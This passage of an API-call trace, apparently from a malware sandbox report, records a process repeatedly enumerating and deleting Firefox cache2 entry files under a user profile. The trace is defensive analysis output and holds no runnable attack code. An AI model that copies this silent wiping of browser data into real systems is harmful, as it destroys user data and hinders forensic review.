lpFindFileData=0x79c8b70) returned 1 [0253.431] lstrlenW (lpString="1355867C7C8ACB52152CDC249B64D742CC40340D") returned 40 [0253.431] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="1355867C7C8ACB52152CDC249B64D742CC40340D" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\1355867C7C8ACB52152CDC249B64D742CC40340D") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\1355867C7C8ACB52152CDC249B64D742CC40340D" [0253.432] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\1355867C7C8ACB52152CDC249B64D742CC40340D" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\1355867c7c8acb52152cdc249b64d742cc40340d")) returned 1 [0253.434] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.434] lstrlenW (lpString="1367E452AEFAA74CB544B69373FCCBB6C0E95AEB") returned 40 [0253.434] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="1367E452AEFAA74CB544B69373FCCBB6C0E95AEB" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\1367E452AEFAA74CB544B69373FCCBB6C0E95AEB") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\1367E452AEFAA74CB544B69373FCCBB6C0E95AEB" [0253.434] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\1367E452AEFAA74CB544B69373FCCBB6C0E95AEB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\1367e452aefaa74cb544b69373fccbb6c0e95aeb")) returned 1 [0253.436] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.436] lstrlenW (lpString="1380A3F977C9CB8D60BD5A90243F6A04E42FAD04") returned 40 [0253.436] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="1380A3F977C9CB8D60BD5A90243F6A04E42FAD04" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\1380A3F977C9CB8D60BD5A90243F6A04E42FAD04") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\1380A3F977C9CB8D60BD5A90243F6A04E42FAD04" [0253.436] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\1380A3F977C9CB8D60BD5A90243F6A04E42FAD04" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\1380a3f977c9cb8d60bd5a90243f6a04e42fad04")) returned 1 [0253.519] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.519] lstrlenW (lpString="13871F2088220BCD932D60C30C272709DEAABB04") returned 40 [0253.519] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="13871F2088220BCD932D60C30C272709DEAABB04" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\13871F2088220BCD932D60C30C272709DEAABB04") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\13871F2088220BCD932D60C30C272709DEAABB04" [0253.519] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\13871F2088220BCD932D60C30C272709DEAABB04" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\13871f2088220bcd932d60c30c272709deaabb04")) returned 1 [0253.521] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.521] lstrlenW (lpString="1456D316BEE665C776E86DC63D0F546BA069BFBE") returned 40 [0253.521] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="1456D316BEE665C776E86DC63D0F546BA069BFBE" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\1456D316BEE665C776E86DC63D0F546BA069BFBE") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\1456D316BEE665C776E86DC63D0F546BA069BFBE" [0253.521] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\1456D316BEE665C776E86DC63D0F546BA069BFBE" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\1456d316bee665c776e86dc63d0f546ba069bfbe")) returned 1 [0253.522] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.524] lstrlenW (lpString="14786BE4B1040FAE49EABD0E2222B7EDCC6DF321") returned 40 [0253.524] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="14786BE4B1040FAE49EABD0E2222B7EDCC6DF321" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\14786BE4B1040FAE49EABD0E2222B7EDCC6DF321") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\14786BE4B1040FAE49EABD0E2222B7EDCC6DF321" [0253.524] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\14786BE4B1040FAE49EABD0E2222B7EDCC6DF321" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\14786be4b1040fae49eabd0e2222b7edcc6df321")) returned 1 [0253.525] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.525] lstrlenW (lpString="14926D90946B0F4BA2FCA38D75A5FBA83EF29AD0") returned 40 [0253.525] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="14926D90946B0F4BA2FCA38D75A5FBA83EF29AD0" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\14926D90946B0F4BA2FCA38D75A5FBA83EF29AD0") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\14926D90946B0F4BA2FCA38D75A5FBA83EF29AD0" [0253.525] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\14926D90946B0F4BA2FCA38D75A5FBA83EF29AD0" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\14926d90946b0f4ba2fca38d75a5fba83ef29ad0")) returned 1 [0253.526] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.526] lstrlenW (lpString="14BF1B21A28D68D02D3CF7A0CA4D66159596ECD1") returned 40 [0253.526] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="14BF1B21A28D68D02D3CF7A0CA4D66159596ECD1" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\14BF1B21A28D68D02D3CF7A0CA4D66159596ECD1") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\14BF1B21A28D68D02D3CF7A0CA4D66159596ECD1" [0253.526] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\14BF1B21A28D68D02D3CF7A0CA4D66159596ECD1" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\14bf1b21a28d68d02d3cf7a0ca4d66159596ecd1")) returned 1 [0253.526] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.526] lstrlenW (lpString="1531FBE50CE357526C558EE71AA60FC4D2E29E0C") returned 40 [0253.527] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="1531FBE50CE357526C558EE71AA60FC4D2E29E0C" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\1531FBE50CE357526C558EE71AA60FC4D2E29E0C") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\1531FBE50CE357526C558EE71AA60FC4D2E29E0C" [0253.527] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\1531FBE50CE357526C558EE71AA60FC4D2E29E0C" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\1531fbe50ce357526c558ee71aa60fc4d2e29e0c")) returned 1 [0253.527] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.527] lstrlenW (lpString="15704E847DCFEC6E9A511A8897461209C820C052") returned 40 [0253.527] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="15704E847DCFEC6E9A511A8897461209C820C052" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\15704E847DCFEC6E9A511A8897461209C820C052") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\15704E847DCFEC6E9A511A8897461209C820C052" [0253.527] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\15704E847DCFEC6E9A511A8897461209C820C052" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\15704e847dcfec6e9a511a8897461209c820c052")) returned 1 [0253.528] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.528] lstrlenW (lpString="15E4224DA48B83948028AEBE08751418DBDE4688") returned 40 [0253.528] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="15E4224DA48B83948028AEBE08751418DBDE4688" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\15E4224DA48B83948028AEBE08751418DBDE4688") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\15E4224DA48B83948028AEBE08751418DBDE4688" [0253.528] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\15E4224DA48B83948028AEBE08751418DBDE4688" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\15e4224da48b83948028aebe08751418dbde4688")) returned 1 [0253.529] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.529] lstrlenW (lpString="16103553C2544720A8768AAA60212BE5916A4CE9") returned 40 [0253.529] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="16103553C2544720A8768AAA60212BE5916A4CE9" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\16103553C2544720A8768AAA60212BE5916A4CE9") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\16103553C2544720A8768AAA60212BE5916A4CE9" [0253.529] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\16103553C2544720A8768AAA60212BE5916A4CE9" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\16103553c2544720a8768aaa60212be5916a4ce9")) returned 1 [0253.530] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.530] lstrlenW (lpString="16114BA75206B6FA4C51ADC8A73DB4C6635F6AF9") returned 40 [0253.530] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="16114BA75206B6FA4C51ADC8A73DB4C6635F6AF9" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\16114BA75206B6FA4C51ADC8A73DB4C6635F6AF9") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\16114BA75206B6FA4C51ADC8A73DB4C6635F6AF9" [0253.530] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\16114BA75206B6FA4C51ADC8A73DB4C6635F6AF9" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\16114ba75206b6fa4c51adc8a73db4c6635f6af9")) returned 1 [0253.531] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.531] lstrlenW (lpString="165A82B735DDDE6F05E29A770A52297EAE982902") returned 40 [0253.531] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="165A82B735DDDE6F05E29A770A52297EAE982902" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\165A82B735DDDE6F05E29A770A52297EAE982902") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\165A82B735DDDE6F05E29A770A52297EAE982902" [0253.531] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\165A82B735DDDE6F05E29A770A52297EAE982902" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\165a82b735ddde6f05e29a770a52297eae982902")) returned 1 [0253.532] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.532] lstrlenW (lpString="16656B13E13FB159C452E606297943961E41BD83") returned 40 [0253.533] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="16656B13E13FB159C452E606297943961E41BD83" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\16656B13E13FB159C452E606297943961E41BD83") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\16656B13E13FB159C452E606297943961E41BD83" [0253.533] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\16656B13E13FB159C452E606297943961E41BD83" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\16656b13e13fb159c452e606297943961e41bd83")) returned 1 [0253.534] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.534] lstrlenW (lpString="167109A0C523F60F2197836B0BCDA9B52A4D16AE") returned 40 [0253.534] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="167109A0C523F60F2197836B0BCDA9B52A4D16AE" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\167109A0C523F60F2197836B0BCDA9B52A4D16AE") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\167109A0C523F60F2197836B0BCDA9B52A4D16AE" [0253.534] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\167109A0C523F60F2197836B0BCDA9B52A4D16AE" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\167109a0c523f60f2197836b0bcda9b52a4d16ae")) returned 1 [0253.535] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.535] lstrlenW (lpString="170F54EDBE19BE8676CC69B53BAC08C8932D118A") returned 40 [0253.535] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="170F54EDBE19BE8676CC69B53BAC08C8932D118A" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\170F54EDBE19BE8676CC69B53BAC08C8932D118A") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\170F54EDBE19BE8676CC69B53BAC08C8932D118A" [0253.535] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\170F54EDBE19BE8676CC69B53BAC08C8932D118A" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\170f54edbe19be8676cc69b53bac08c8932d118a")) returned 1 [0253.535] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.535] lstrlenW (lpString="1722A63DF48E38B5DC308AE741FBFA24F762D8AC") returned 40 [0253.536] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="1722A63DF48E38B5DC308AE741FBFA24F762D8AC" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\1722A63DF48E38B5DC308AE741FBFA24F762D8AC") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\1722A63DF48E38B5DC308AE741FBFA24F762D8AC" [0253.536] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\1722A63DF48E38B5DC308AE741FBFA24F762D8AC" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\1722a63df48e38b5dc308ae741fbfa24f762d8ac")) returned 1 [0253.537] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.537] lstrlenW (lpString="17FDE78A9ACA4445D5D13C94208BC4B0E4BA046A") returned 40 [0253.537] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="17FDE78A9ACA4445D5D13C94208BC4B0E4BA046A" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\17FDE78A9ACA4445D5D13C94208BC4B0E4BA046A") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\17FDE78A9ACA4445D5D13C94208BC4B0E4BA046A" [0253.537] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\17FDE78A9ACA4445D5D13C94208BC4B0E4BA046A" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\17fde78a9aca4445d5d13c94208bc4b0e4ba046a")) returned 1 [0253.539] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.539] lstrlenW (lpString="1801CFE5BC39C5B24721E8CB2F32854EF5C5F96A") returned 40 [0253.539] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="1801CFE5BC39C5B24721E8CB2F32854EF5C5F96A" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\1801CFE5BC39C5B24721E8CB2F32854EF5C5F96A") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\1801CFE5BC39C5B24721E8CB2F32854EF5C5F96A" [0253.539] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\1801CFE5BC39C5B24721E8CB2F32854EF5C5F96A" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\1801cfe5bc39c5b24721e8cb2f32854ef5c5f96a")) returned 1 [0253.540] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.540] lstrlenW (lpString="1833D74FE9FD5E002D12AD1D5CE9845C539E6D49") returned 40 [0253.540] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="1833D74FE9FD5E002D12AD1D5CE9845C539E6D49" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\1833D74FE9FD5E002D12AD1D5CE9845C539E6D49") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\1833D74FE9FD5E002D12AD1D5CE9845C539E6D49" [0253.540] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\1833D74FE9FD5E002D12AD1D5CE9845C539E6D49" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\1833d74fe9fd5e002d12ad1d5ce9845c539e6d49")) returned 1 [0253.546] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.547] lstrlenW (lpString="19B6A58F54F979D1CF008970B9B0D36B11B7944D") returned 40 [0253.547] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="19B6A58F54F979D1CF008970B9B0D36B11B7944D" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\19B6A58F54F979D1CF008970B9B0D36B11B7944D") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\19B6A58F54F979D1CF008970B9B0D36B11B7944D" [0253.547] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\19B6A58F54F979D1CF008970B9B0D36B11B7944D" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\19b6a58f54f979d1cf008970b9b0d36b11b7944d")) returned 1 [0253.548] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.548] lstrlenW 